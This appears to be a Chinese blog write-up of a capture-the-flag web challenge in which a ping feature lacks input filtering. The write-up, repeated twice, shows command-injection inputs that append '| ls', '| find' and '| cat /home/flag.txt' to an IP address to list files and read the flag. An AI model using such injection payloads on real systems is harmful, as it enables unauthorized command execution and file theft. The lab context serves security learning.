题目来源: Cyberpeace-n3k0
题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
首先测试一下127.0.0.1,发现返回了ping的结果
然后127.0.0.1 | ls,返回index.php,命令被成功zhixing
127.0.0.1 | find / -name flag.txt,找到flag.txt,位于/home下
127.0.0.1 | cat /home/flag.txt,得到flag
题目来源: Cyberpeace-n3k0
题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
首先测试一下127.0.0.1,发现返回了ping的结果
然后127.0.0.1 | ls,返回index.php,命令被成功zhixing
127.0.0.1 | find / -name flag.txt,找到flag.txt,位于/home下
127.0.0.1 | cat /home/flag.txt,得到flag
上一篇:关于c++初始化原理与性能的讨论
下一篇:xff_referer
Web应用防护系统(也称为网站应用级入侵防御系统。英文WebApplicationFirewall,简
连
举报文章
请选择举报类型
补充说明
0/200
上传截图
格式支持JPEG/PNG/JPG,图片不超过1.9M